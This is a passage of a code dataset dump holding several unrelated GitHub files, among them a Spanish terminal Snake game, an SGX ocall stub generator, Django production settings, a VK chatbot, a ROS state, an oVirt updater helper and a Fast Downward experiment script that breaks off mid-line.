comidita)\r\n else:\r\n comidita = \"*\"\r\n stdscr.addstr(randomY, randomX, comidita)\r\n else:\r\n stdscr.addstr(randomY, randomX, comidita)\r\n \r\n if Pausa is False:\r\n if direccion in [curses.KEY_UP, 450]:\r\n # Lo que haré aquí será atravesar la pared\r\n # por medio de la cabeza del snake\r\n if temporal.cY <= 3:\r\n temporal.cY = alto-3\r\n else:\r\n tempCX = temporal.cX\r\n tempCY = temporal.cY\r\n temporal.cY -= 1\r\n elif direccion in [curses.KEY_DOWN, 456]:\r\n if temporal.cY >= alto - 3:\r\n temporal.cY = 3\r\n else:\r\n tempCX = temporal.cX\r\n tempCY = temporal.cY\r\n temporal.cY += 1 \r\n elif direccion in [curses.KEY_LEFT, 452]:\r\n if temporal.cX <= 3:\r\n temporal.cX = ancho - 4\r\n else:\r\n tempCX = temporal.cX\r\n tempCY = temporal.cY\r\n temporal.cX -= 1\r\n elif direccion in [curses.KEY_RIGHT, 454]:\r\n if temporal.cX >= ancho - 4:\r\n temporal.cX = 3\r\n else:\r\n tempCX = temporal.cX\r\n tempCY = temporal.cY\r\n temporal.cX += 1\r\n serpiente.actualizar(tempCX,tempCY)\r\n \r\n if colision_sinComida == False:\r\n alto, ancho = stdscr.getmaxyx()\r\n stdscr.addstr(1,25 - len(\"Puntaje\"),\"Puntaje = \" + str(punteo))\r\n stdscr.addstr(1,50 - len(\"Nivel\"),\"Nivel = \" + str(nivel))\r\n stdscr.addstr(1,75 - len(\"Usuario\"),\"Usuario = \" + str(nombreUsuario))\r\n stdscr.border(0)\r\n textpad.rectangle(stdscr, 2, 2, alto - 2, ancho - 3)\r\n while temporal is not None:\r\n stdscr.addstr(int(str(temporal.cY)), int(str(temporal.cX)), str(temporal.char))\r\n temporal = temporal.siguiente\r\n stdscr.refresh()\r\n colision_sinComida = serpiente.colision(True)\r\n else:\r\n serpiente.generarReporte()\r\n userScoreReport.push(nombreUsuario,punteo)\r\n serpiente.cantidad = 0\r\n punteo = 0\r\n serpiente.vaciarSerpiente()\r\n stdscr.clear()\r\n stdscr.timeout(-1)\r\n alto, ancho = stdscr.getmaxyx()\r\n stdscr.addstr(alto//2, ancho//2 - len(\"GAME OVER\"), \"GAME OVER\")\r\n stdscr.addstr(alto//2 + 1, ancho//2 - len(\"Presiona una tecla para continuar...\"), \"Presiona una tecla para continuar...\")\r\n stdscr.refresh()\r\n stdscr.getch()\r\n break\r\n else:\r\n serpiente.generarReporte()\r\n stdscr.clear()\r\n stdscr.addstr(alto//2,ancho//2 - len(\"PAUSA\"),\"PAUSA\")\r\n stdscr.refresh()\r\n## Mostraremos el Score actual en tabla\r\ndef mostrarTablaPuntaje(stdscr):\r\n stdscr.clear()\r\n stdscr.border(0)\r\n alto, ancho = stdscr.getmaxyx()\r\n temporal = userScoreReport\r\n temporalito = userScoreReport.ancla\r\n if temporal.numeroPunteos > 0:\r\n y = 5\r\n stdscr.addstr(y, ancho//4, \"Nombre\")\r\n stdscr.addstr(y, ancho//2, \"Punteo\")\r\n while temporalito.siguiente is not None:\r\n y = y + 1\r\n temporalito = temporalito.siguiente\r\n stdscr.addstr(y, ancho//4, temporalito.nombre)\r\n stdscr.addstr(y, ancho//2, str(temporalito.puntuacion))\r\n else:\r\n stdscr.addstr(alto//2, ancho//2 - len(\"NO HAY PUNTEOS QUE MOSTRAR\"), \"NO HAY PUNTEOS QUE MOSTRAR\")\r\n stdscr.refresh()\r\n stdscr.getch()\r\n## Será el apartado para dibujar el menú inicial\r\ndef pintarMenuInicial(stdscr, opcionElegida):\r\n # despinto la pantalla\r\n stdscr.clear()\r\n # Obtenemos el tamaño máximo de la pantalla\r\n alto, ancho = stdscr.getmaxyx()\r\n for index, fila in enumerate(menu):\r\n x = ancho//2 - 20\r\n y = alto//2 - len(menu)//2 + index\r\n if(opcionElegida == index):\r\n stdscr.attron(curses.color_pair(1))\r\n stdscr.addstr(y,x,fila)\r\n stdscr.attroff(curses.color_pair(1))\r\n else:\r\n stdscr.addstr(y,x,fila)\r\n stdscr.addstr(1,1,\"ESC Salir\")\r\n stdscr.refresh()\r\ndef 
pintarMenuReportes(stdscr, opcionElegida):\r\n # despinto la pantalla\r\n stdscr.clear()\r\n # Obtenemos el tamaño máximo de la pantalla\r\n alto, ancho = stdscr.getmaxyx()\r\n for index, fila in enumerate(reportes):\r\n x = ancho//2 - 20\r\n y = alto//2 - len(reportes)//2 + index\r\n if(opcionElegida == index):\r\n stdscr.attron(curses.color_pair(1))\r\n stdscr.addstr(y,x,fila)\r\n stdscr.attroff(curses.color_pair(1))\r\n else:\r\n stdscr.addstr(y,x,fila)\r\n stdscr.addstr(2,2,\"ESC Salir\")\r\n stdscr.addstr(alto//2 - 5, ancho//2 - len(\"REPORTES\"), \"REPORTES\")\r\n stdscr.refresh()\r\n## Pintar menu de repotes\r\ndef menuReportes(stdscr):\r\n stdscr.border(0)\r\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\r\n opcion = 0\r\n pintarMenuReportes(stdscr, opcion)\r\n while True:\r\n tecla = stdscr.getch()\r\n if tecla == 450 or tecla == curses.KEY_UP and opcion > 0:\r\n opcion -= 1\r\n elif tecla == 456 or tecla == curses.KEY_DOWN and opcion < len(reportes) - 1:\r\n opcion += 1\r\n elif tecla == 10 or tecla == curses.KEY_ENTER:\r\n ## Limpiaremos primero la pantalla para mostrar el siguiente\r\n stdscr.clear()\r\n ## Aqui reconocemos que el usuario ha pulsado enter\r\n # Por lo tanto veremos en que \"opcion\" hizo enter\r\n if opcion is 0:\r\n # Mostraremos el juego como tal\r\n userScoreReport.graficar()\r\n elif opcion is 1:\r\n # Mostraremos la tabla de puntaje\r\n usuarios.graficar()\r\n elif tecla == 27 or tecla == curses.KEY_ABORT:\r\n # Si el usuario pulsa ESC en el menu inicial, se saldrá del programa\r\n break\r\n pintarMenuReportes(stdscr, opcion)\r\n# Ingreso de archivo .csv\r\ndef llenadoMasivo(stdscr):\r\n stdscr.clear()\r\n stdscr.addstr(1,1, \"ESC - Salir\")\r\n stdscr.addstr(2,1,\"Carga Masiva _ Archivos CSV\")\r\n stdscr.addstr(3,1,\"Funcionamiento:\")\r\n stdscr.addstr(4,1,\"Coloca el archivo .csv en la carpeta del juego\")\r\n stdscr.addstr(5,1,\"Escribe el nombre del archivo:\")\r\n cadenaTexto = \"\"\r\n while True:\r\n tecla = stdscr.getkey()\r\n stdscr.clear()\r\n if tecla is \"\\n\":\r\n try:\r\n i = 0\r\n nNombre = 1\r\n archivo = open(cadenaTexto, \"r\", newline=\"\")\r\n for linea in archivo:\r\n dato = linea.split(\",\\r\\n\")\r\n dato.append(dato)\r\n for nombre in dato:\r\n if i%3 == 0 and nNombre is not 1:\r\n usuarios.ingresar(nombre)\r\n i = i + 1\r\n nNombre = nNombre + 1\r\n break\r\n except Exception:\r\n stdscr.attron(curses.color_pair(1))\r\n stdscr.addstr(0,1,\"Ha ocurrido un error, intentalo nuevamente :/\")\r\n stdscr.attroff(curses.color_pair(1))\r\n elif tecla is \"\\x08\":\r\n cadenaTexto = cadenaTexto[0:len(cadenaTexto) - 1]\r\n elif tecla is \"\\x1b\":\r\n break\r\n else:\r\n cadenaTexto = cadenaTexto + tecla\r\n stdscr.addstr(1,1, \"ESC - Salir\")\r\n stdscr.addstr(2,1,\"Carga Masiva _ Archivos CSV\")\r\n stdscr.addstr(3,1,\"Funcionamiento:\")\r\n stdscr.addstr(4,1,\"Coloca el archivo .csv en la carpeta del juego\")\r\n stdscr.addstr(5,1,\"Escribe el nombre del archivo:\")\r\n stdscr.addstr(6,1,cadenaTexto)\r\n stdscr.refresh()\r\n## Servirá para elegir el personaje en el menú seleccionado\r\ndef elegirPersonaje(stdscr):\r\n #Contamos el numero de jugadores registrados\r\n numero = usuarios.cantidad()\r\n if numero > 0:\r\n # Hay jugadores, muestro el siguiente menu\r\n stdscr.clear()\r\n alto, ancho = stdscr.getmaxyx()\r\n x = ancho//2 - len(\"Elige tu Nombre\")\r\n y = alto//2 - 2\r\n stdscr.addstr(1,1,\"ESC Salir\")\r\n stdscr.addstr(y,x,\"Elige tu Nombre\")\r\n stdscr.addstr(y + 1,x - 
len(usuarios.ancla.siguiente.nombre),\"<-- \" + usuarios.ancla.siguiente.nombre + \" -->\")\r\n # While para que sea mientras presione un boton\r\n while True:\r\n tecla = stdscr.getch()\r\n stdscr.clear()\r\n if tecla == curses.KEY_LEFT or tecla == 452 or tecla == curses.KEY_UP or tecla == 450:\r\n # Pediré el usuario que está a la izquierda o sea al anterior del actual y lo mostraré en pantalla\r\n nombreJugador = usuarios.jugador(\"L\")\r\n elif tecla == curses.KEY_RIGHT or tecla == 454 or tecla == curses.KEY_DOWN or tecla == 456:\r\n # Pediré el usuario que está a la derecha o siguiente del actual\r\n nombreJugador = usuarios.jugador(\"R\")\r\n elif tecla == 10 or tecla == curses.KEY_ENTER:\r\n # El usuario ha tecleado el Enter, entonces ha seleccionado un jugador\r\n # el juego empieza con el nombre del jugador seleccionado\r\n pintarJuego(stdscr, nombreJugador)\r\n break\r\n elif tecla == 27 or tecla == curses.KEY_ABORT:\r\n # Al usuario que pulse ESC se le mostrará el menu de inicio.\r\n break\r\n # Muestro el nombre de manera mucho más corta\r\n stdscr.addstr(1,1,\"ESC Salir\")\r\n stdscr.addstr(y,x,\"Elige tu Nombre\")\r\n xnomJug = ancho//2 - len(\"Elige tu Nombre\")\r\n ynomJug = alto//2\r\n stdscr.addstr(ynomJug, xnomJug,\"<-- \"+ nombreJugador +\" -->\")\r\n stdscr.refresh()\r\n else:\r\n #No hay jugadores, muestro el menu de registro\r\n registrarUsuario(stdscr)\r\n\r\n\r\n # Menu para registrar un usuario\r\ndef registrarUsuario(stdscr):\r\n stdscr.clear()\r\n alto, ancho = stdscr.getmaxyx()\r\n x = ancho//2 - len(\"Ingresa tu Nombre:\")\r\n y = alto//2\r\n stdscr.addstr(1,1,\"ESC Salir\")\r\n stdscr.addstr(y, x, \"Ingresa tu Nombre:\")\r\n nombreIngresado = \"\"\r\n # un While para pedir los caracteres del nombre\r\n while True:\r\n tecla = stdscr.getkey()\r\n if tecla is \"\\x08\":\r\n nombreIngresado = nombreIngresado[0:len(nombreIngresado) - 1]\r\n if tecla is \"\\n\":\r\n ## Vamos a registrar el nombre ingresado por el usuario\r\n usuarios.ingresar(nombreIngresado)\r\n pintarJuego(stdscr, nombreIngresado)\r\n break\r\n elif tecla is \"\\x1b\":\r\n break\r\n else:\r\n stdscr.clear()\r\n # Voy a mostrar un mensaje que me pida el nombre\r\n stdscr.addstr(y, x, \"Ingresa tu Nombre:\")\r\n nombreIngresado += tecla\r\n xnom = ancho//2 - len(\"Ingresa tu Nombre:\")\r\n ynom = alto//2 + 2\r\n stdscr.addstr(ynom,xnom,nombreIngresado)\r\n stdscr.refresh()\r\n## Inicio de juego de verdad\r\n## Primero comenzaré con el diseño del Menú Inicial\r\ndef menuInicial(stdscr):\r\n stdscr = curses.initscr()\r\n curses.curs_set(0)\r\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\r\n opcion = 0\r\n ## Pintaremos el menú para mostrarlo xd\r\n pintarMenuInicial(stdscr, opcion)\r\n while True:\r\n ## Pediremos al Usuario una opcion dependiendo de la tecla\r\n tecla = stdscr.getch()\r\n # Limpiaremos la pantalla de consola\r\n stdscr.clear()\r\n ## Ahora verificamos que tecla pulso el usuario\r\n if tecla == 450 or tecla == curses.KEY_UP and opcion > 0:\r\n opcion -= 1\r\n elif tecla == 456 or tecla == curses.KEY_DOWN and opcion < len(menu) - 1:\r\n opcion += 1\r\n elif tecla == 10 or tecla == curses.KEY_ENTER:\r\n ## Limpiaremos primero la pantalla para mostrar el siguiente\r\n stdscr.clear()\r\n ## Aqui reconocemos que el usuario ha pulsado enter\r\n # Por lo tanto veremos en que \"opcion\" hizo enter\r\n if opcion is 0:\r\n # Mostraremos el juego como tal\r\n pintarJuego(stdscr, \"\")\r\n elif opcion is 1:\r\n # Mostraremos la tabla de puntaje\r\n 
mostrarTablaPuntaje(stdscr)\r\n elif opcion is 2:\r\n # Mostraremos el menú para elegir \"personaje\"\r\n elegirPersonaje(stdscr)\r\n elif opcion is 3:\r\n # Mostraremos el menú para los reportes\r\n menuReportes(stdscr)\r\n elif opcion is 4:\r\n # Mostraremos el menú para el llenado masivo\r\n llenadoMasivo(stdscr)\r\n elif tecla == 27 or tecla == curses.KEY_ABORT:\r\n # Si el usuario pulsa ESC en el menu inicial, se saldrá del programa\r\n break\r\n pintarMenuInicial(stdscr, opcion)\r\ncurses.wrapper(menuInicial)","repo_name":"Ricardo16X/EDD_2S2019_P1_201700524","sub_path":"SNAKE/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":18413,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30186627139","text":"#!/usr/bin/python\n\nocalls = [\n 'clock',\n 'time',\n 'localtime',\n 'gmtime',\n 'mktime',\n 'gettimeofday',\n 'puts',\n 'push_gadget',\n 'open',\n 'close',\n 'read',\n 'write',\n 'lseek',\n 'socket',\n 'bind',\n 'connect',\n 'listen',\n 'accept',\n 'fstat',\n 'send',\n 'recv',\n 'sendto',\n 'recvfrom',\n 'gethostname',\n 'getaddrinfo',\n 'getenv',\n 'getsockname',\n 'getsockopt',\n 'getservbyname',\n 'getprotobynumber',\n 'setsockopt',\n 'htons',\n 'htonl',\n 'ntohs',\n 'ntohl',\n 'signal',\n 'shutdown',\n]\n\nalign = 5\nmsg = 'this file is generated by lib/gen_ocall_stub.py script\\n'\n\nmakefile = open('ocall.mk', 'w')\nmakefile.write('# ' + msg)\nmakefile.write('OCALL_OBJS = \\\\\\n')\nocalltab = open('ocall_table.cpp', 'w')\nocalltab.write('// ' + msg)\nocalltab.write('static void *ocall_table[' + str(len(ocalls)) + '] = {\\n')\ni = 0\nfor o in ocalls:\n makefile.write('\\t$(OCALL_OBJS_DIR)' + o + '.o \\\\\\n')\n ocalltab.write(' (void *) sgx_' + o + ',\\n')\n asm = open(o + '.s', 'w')\n asm.write('# ' + msg)\n asm.write('.text\\n')\n asm.write('.global ' + o + '\\n')\n asm.write('.type %s, @function\\n' % o)\n asm.write('.p2align %d\\n' % align)\n asm.write(o + ':\\n')\n asm.write(' mov $' + str(i) + ', %r15\\n')\n asm.write(' jmp sgx_ocall\\n')\n asm.close()\n i = i + 1\n\nocalltab.write('};\\n\\n')\ndo_sgx_ocall = \\\n'// TODO: check if it breaks the calling ABI\\n\\\nvoid do_sgx_ocall() {\\n\\\n __asm__ __volatile__ (\\n\\\n \"mov (%0, %%r15, 8), %%r15\\\\n\"\\n\\\n \"call *%%r15\\\\n\"\\n\\\n ::\"r\" (ocall_table));\\n\\\n}\\n'\nocalltab.write(do_sgx_ocall)\nocalltab.close()\n\nmakefile.close()\n","repo_name":"jaebaek/SGX-Shield","sub_path":"program/lib/gen_ocall_stub.py","file_name":"gen_ocall_stub.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"53"} +{"seq_id":"2073383448","text":"import sys\nfrom contest_utils import leer_participantes, crear_diccionario_capitan;\nfrom investment_counting import obtener_cantidad_inversiones;\n\ndef main():\n if len(sys.argv) != 3:\n print(\"Uso: python contest.py participantes.txt 4\")\n return\n\n archivo_participantes = sys.argv[1]\n pos_capitan = sys.argv[2]\n participantes, capitan = leer_participantes(archivo_participantes, pos_capitan)\n \n if capitan is None:\n print(\"Número de capitán inválido\")\n return\n \n categorias_capitan = crear_diccionario_capitan(capitan['categorias'])\n \n nombre_companiero = \"\"\n max_inversiones = -1\n \n for un_participante in participantes:\n inversiones_participantes = obtener_cantidad_inversiones(un_participante[1], categorias_capitan)\n if inversiones_participantes > max_inversiones:\n max_inversiones = 
inversiones_participantes\n            nombre_companiero = un_participante[0]\n    \n    print(f"{capitan['nombre']}, {nombre_companiero}")\n    \nif __name__ == \"__main__\":\n    main()","repo_name":"FrancoSecchi/tda","sub_path":"tp1/contest/contest.py","file_name":"contest.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"28698858118","text":"from .settings import *\n\n\nSECRET_KEY = os.environ.get(\"SECRET_KEY\")\nDEBUG = int(os.environ.get(\"DEBUG\", default=0))\nALLOWED_HOSTS = os.environ.get(\"DJANGO_ALLOWED_HOSTS\").split(\" \")\n\nCONN_MAX_AGE = 300\n\nDATABASES = {\n    \"default\": {\n        \"ENGINE\": os.environ.get(\"SQL_ENGINE\", \"django.db.backends.sqlite3\"),\n        \"NAME\": os.environ.get(\"SQL_DATABASE\", os.path.join(BASE_DIR, \"db.sqlite3\")),\n        \"USER\": os.environ.get(\"SQL_USER\", \"user\"),\n        \"PASSWORD\": os.environ.get(\"SQL_PASSWORD\", \"password\"),\n        \"HOST\": os.environ.get(\"SQL_HOST\", \"localhost\"),\n        \"PORT\": os.environ.get(\"SQL_PORT\", \"5432\"),\n    }\n}\n\nREDIS_SERVER_NAME = os.environ.get(\"REDIS_SERVER_NAME\",default=\"redis\")\n\nKAVENEGAR_TOKEN = os.environ[\"KAVENEGAR_TOKEN\"]\n\nSIMPLE_JWT = {\n    'ACCESS_TOKEN_LIFETIME':timedelta(days=60),\n    'REFRESH_TOKEN_LIFETIME':timedelta(days=61)\n    }\n\n\nAWS_ACCESS_KEY_ID = os.environ.get(\"STORAGE_ACCESS_KEY_ID\")\nAWS_SECRET_ACCESS_KEY = os.environ.get(\"STORAGE_SECRET_ACCESS_KEY\")\nAWS_STORAGE_BUCKET_NAME = os.environ.get(\"STORAGE_BUCKET_NAME\")\nAWS_S3_ENDPOINT_URL = \"https://s3.ir-thr-at1.arvanstorage.com\"\nAWS_S3_OBJECT_PARAMETERS = {\n    'CacheControl':'max-age=86400'\n}\n\nAWS_LOCATION = \"static\"\n\n# STATICFILES_DIRS = [\n#     os.path.join(BASE_DIR, 'static'),\n#     ]\n\nSTATIC_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{AWS_LOCATION}/'\nSTATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nAWS_S3_FILE_OVERWRITE = False\nDEFAULT_FILE_STORAGE = \"netproject.storage_backends.MediaStorage\"\n\nCELERY_BROKER_URL=\"amqp://{}:{}\".format(os.environ.get(\"RABBITMQ_HOST\"), os.environ.get(\"RABBITMQ_PORT\", 5672))\n","repo_name":"devprofile98/netlabproject","sub_path":"netproject/prod-settings.py","file_name":"prod-settings.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"28041930596","text":"import bs4\nimport requests\nimport vk_api\nfrom vk_api.longpoll import VkLongPoll, VkEventType\n\n\nclass VkBot:\n    \"\"\"Bot class. Collects the user's id and name, and implements the bot's simplest commands\n    needed for greeting and saying goodbye.\"\"\"\n\n    # __init__ is a public method; self refers to the object itself\n    def __init__(self, user_id):\n        # The user id is stored here\n        self._USER_ID = user_id\n        # The user's name is stored here for addressing them in messages\n        self._USERNAME = self._get_user_name_from_vk_id(user_id)\n        # The simplest basic commands\n        self._COMMANDS = [\"привет\",\n                          \"ghbdtn\",\n                          \"пока\"]\n\n    def _get_user_name_from_vk_id(self, user_id):\n        \"\"\"Gets the user name from the vk id\"\"\"\n        # Request the user's page by id\n        request = requests.get(\"https://vk.com/id\" + str(user_id))\n        # parse it\n        soup = bs4.BeautifulSoup(request.text, \"html.parser\")\n        user_name = self._clean_all_tag_from_str(soup.findAll(\"title\")[0])\n        # Return the user name\n        return user_name.split()[0]\n\n    def read_command_file(self):\n        \"\"\"Reads the file with the bot commands and returns them\"\"\"\n        # Read the file that contains all bot commands\n        commandsFile = open(\"commands.txt\")\n        return commandsFile.read()\n\n    def new_message(self, message):\n        \"\"\"Processes the user's message and returns a reply\"\"\"\n        # Greeting. Lower-case the message text so the check is case-insensitive\n        if message.lower() == self._COMMANDS[0]:\n            return f\"Привет, {self._USERNAME}! Я - Зодиакус - твой проводник в мир толкования звёзд.\\n \" \\\n                   f\"Вот список моих команд:\\n\" + self.read_command_file()\n        # Keyboard layout\n        elif message.lower() == self._COMMANDS[1]:\n            return f\"Для общения поменяй раскладку клавиатуры - я понимаю только русский 😜\"\n        # Farewell\n        elif message.lower() == self._COMMANDS[2]:\n            return f\"Пока-пока, {self._USERNAME}!\"\n        else:\n            return f\"Я ничего не понял... Напиши команду ещё раз.\\n\" \\\n                   f\"Введи команды, чтобы посмотреть их список.\"\n\n    # Helper method for stripping unwanted tags\n    @staticmethod\n    def _clean_all_tag_from_str(string_line):\n        \"\"\"\n        Strip tags and their contents from string_line\n        :param string_line: the string to clean\n        :return: the cleaned string\n        \"\"\"\n        result = \"\"\n        not_skip = True\n        for i in list(string_line):\n            if not_skip:\n                if i == \"<\":\n                    not_skip = False\n                else:\n                    result += i\n            else:\n                if i == \">\":\n                    not_skip = True\n\n        return result\n","repo_name":"KateBashkirova/ZodiacusBot","sub_path":"zodiacusBrains.py","file_name":"zodiacusBrains.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"43135307979","text":"#!/usr/bin/env python \n#-*- coding: utf-8 -*-\n\nfrom time import time\nimport rospy\n\nfrom flexbe_core import EventState, Logger\nfrom geometry_msgs.msg import Pose, Point, Quaternion\n\nclass set_initial_position(EventState):\n\n    '''\n        Set the initial position of the sub for simulation only\n\n        <= continue            Indicates completion of the calculation.\n\n    '''\n\n    def __init__(self, simulation=False):\n        \n        super(set_initial_position, self).__init__(outcomes=['continue'])\n\n        self.set_initial_position_pub = rospy.Publisher('/proc_simulation/start_simulation', Pose, queue_size=2)\n\n        self.param_simulation = simulation\n\n    def execute(self, userdata):\n        if self.param_simulation == True:\n            Logger.log('Setting initial condition', Logger.REPORT_HINT)\n            pose = Pose()\n            pose.position = Point(0.,0.,0.)\n            pose.orientation = Quaternion(0.,0.,0.,1)\n            self.set_initial_position_pub.publish(pose)\n        else:\n            Logger.log('Not in simulation. 
No need for initial condition', Logger.REPORT_HINT)\n return 'continue'\n\n def on_exit(self, userdata):\n pass\n","repo_name":"sonia-auv/sonia-behaviors","sub_path":"sonia_navigation_states/src/sonia_navigation_states/set_initial_position.py","file_name":"set_initial_position.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34903550313","text":"\"\"\"Tools for writing actuators of type updater\"\"\"\n\n\nfrom functools import wraps, partial\nfrom logging import Logger\nimport os\nfrom typing import Callable\n\n\nfrom stdci_libs.git_utils import prep_git_repo, get_name_from_repo_url, commit_files\nfrom stdci_tools.pusher import push_to_scm as push_upstream_sources\nfrom stdci_libs import file_utils\n\nfrom stdci_libs.actuators.common import (\n repo_url_arg,\n refspec_arg,\n target_branch_arg,\n push_map_arg,\n)\nfrom stdci_libs.common_cli import compose_decorators\n\n\n\"\"\"Common CLI for updater scripts\"\"\"\nupdater_cli = compose_decorators(\n repo_url_arg,\n refspec_arg,\n target_branch_arg,\n push_map_arg,\n)\n\n\ndef committing_updater(func: Callable) -> Callable:\n \"\"\"Injects a callable that contains a common updater logic\n\n The purpose of this decorator is to remove the boilerplate code\n that pass the common arguments to updater_main\n\n :param func: The callable to wrap\n \"\"\"\n @wraps(func)\n def committing_updater_func(\n repo_url: str,\n refspec: str,\n target_branch: str,\n push_map: str,\n **kwargs\n ):\n \"\"\"\n For the description about the arguments please look at\n `updater_main`.\n \"\"\"\n updater_main_with_args = partial(\n updater_main,\n repo_url=repo_url,\n refspec=refspec,\n target_branch=target_branch,\n push_map=push_map\n )\n return func(\n committing_updater_func=updater_main_with_args,\n **kwargs\n )\n\n return committing_updater_func\n\n\ndef updater_main(\n repo_url: str,\n refspec: str,\n target_branch: str,\n push_map: str,\n updater_func: Callable[[], None],\n logger: Logger,\n execute_commit: bool = False,\n automerge: bool = False\n):\n \"\"\"Run the actual logic to update the upstream source and push the changes\n\n :param repo_url: midstream repository URL\n :param refspec: refspec to fetch\n :param target_branch: branch to push the changes to\n :param push_map: path to pusher push map\n :param updater_func: A callable that is called with the root of the\n repository as the first argument and run the actual update.\n :param logger: logger instance that will be used to log messages\n :param execute_commit: Apply commit after running the updater func\n :param automerge: Enable automerge in commit message (applicable only\n when execute_commit is set to true).\n \"\"\"\n repo_name = get_name_from_repo_url(repo_url)\n repo_root = os.path.join(os.getcwd(), repo_name)\n logger.info('adding repo url: %s', repo_url)\n _, fetch_sha = prep_git_repo(repo_root, repo_url, refspec, checkout=True)\n with file_utils.workdir(repo_root):\n ret = updater_func()\n if execute_commit:\n add_headers = {}\n if automerge:\n add_headers[\"automerge\"] = \"yes\"\n commit_files(\n [\".\"],\n change_id_headers=[\"x-md5\"],\n add_headers=add_headers\n )\n push_upstream_sources(\n dst_branch=target_branch,\n push_map=push_map,\n if_not_exists=True,\n unless_hash=fetch_sha\n )\n\n return 
ret\n","repo_name":"oVirt/jenkins","sub_path":"stdci_libs/actuators/updaters.py","file_name":"updaters.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"12891046222","text":"def solution(s):\n answer = True\n \n # [실행] 버튼을 누르면 출력 값을 볼 수 있습니다.\n #print('Hello Python')\n chk1=0\n \n for i in s:\n if chk1==0 and i==')':\n return False\n elif chk1!=0 and i==')':\n chk1-=1\n else:\n chk1+=1\n if chk1!=0:\n return False\n \n return True","repo_name":"Tigerfriend1/Python_algorithm_practice","sub_path":"python/prgLV2_올바른괄호.py","file_name":"prgLV2_올바른괄호.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27665196097","text":"#Напишите код, который выведет на экране все имена полей объекта произвольного пользовательского класса, кроме служебных имен.\n\nclass Object:\n def __init__(self, form, consistency):\n self.form = form\n self.consistency = consistency\n\np = Object(\"Square\", \"Solid\")\nall_names = dir(p)\nprint(all_names)\n\nfield_names = [name for name in all_names if not name.startswith(\"__\")]\nprint(\", \".join(field_names))","repo_name":"SakanaKoi/Python_4sem","sub_path":"Part4/Task1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31004416728","text":"#! /usr/bin/env python\n\nimport os\nimport shutil\n\nimport custom_parser\n\nimport project\n\n\nREPO = project.get_repo_base()\nBENCHMARKS_DIR = os.environ[\"DOWNWARD_BENCHMARKS\"]\nSCP_LOGIN = \"myname@myserver.com\"\nREMOTE_REPOS_DIR = \"/infai/seipp/projects\"\n# If REVISION_CACHE is None, the default \"./data/revision-cache/\" is used.\nREVISION_CACHE = os.environ.get(\"DOWNWARD_REVISION_CACHE\")\nif project.REMOTE:\n SUITE = project.SUITE_SATISFICING\n ENV = project.BaselSlurmEnvironment(email=\"my.name@myhost.ch\")\nelse:\n SUITE = [\"depot:p01.pddl\", \"grid:prob01.pddl\", \"gripper:prob01.pddl\"]\n ENV = project.LocalEnvironment(processes=2)\n\nCONFIGS = [\n (f\"{index:02d}-{h_nick}\", [\"--search\", f\"eager_greedy([{h}])\"])\n for index, (h_nick, h) in enumerate(\n [\n (\"cg\", \"cg(transform=adapt_costs(one))\"),\n (\"ff\", \"ff(transform=adapt_costs(one))\"),\n ],\n start=1,\n )\n]\nBUILD_OPTIONS = []\nDRIVER_OPTIONS = [\"--overall-time-limit\", \"5m\"]\nREV_NICKS = [\n (\"main\", \"\"),\n]\nATTRIBUTES = [\n \"error\",\n \"run_dir\",\n \"search_start_time\",\n \"search_start_memory\",\n \"total_time\",\n \"h_values\",\n \"coverage\",\n \"expansions\",\n \"memory\",\n project.EVALUATIONS_PER_TIME,\n]\n\nexp = project.FastDownwardExperiment(environment=ENV, revision_cache=REVISION_CACHE)\nfor config_nick, config in CONFIGS:\n for rev, rev_nick in REV_NICKS:\n algo_name = f\"{rev_nick}:{config_nick}\" if rev_nick else config_nick\n exp.add_algorithm(\n algo_name,\n REPO,\n rev,\n config,\n build_options=BUILD_OPTIONS,\n driver_options=DRIVER_OPTIONS,\n )\nexp.add_suite(BENCHMARKS_DIR, SUITE)\n\nexp.add_parser(exp.EXITCODE_PARSER)\nexp.add_parser(exp.TRANSLATOR_PARSER)\nexp.add_parser(exp.SINGLE_SEARCH_PARSER)\nexp.add_parser(custom_parser.get_parser())\nexp.add_parser(exp.PLANNER_PARSER)\n\nexp.add_step(\"build\", exp.build)\nexp.add_step(\"start\", exp.start_runs)\nexp.add_step(\"parse\", exp.parse)\nexp.add_fetcher(name=\"fetch\")\n\nif not project.REMOTE:\n exp.add_step(\"remove-eval-dir\", 
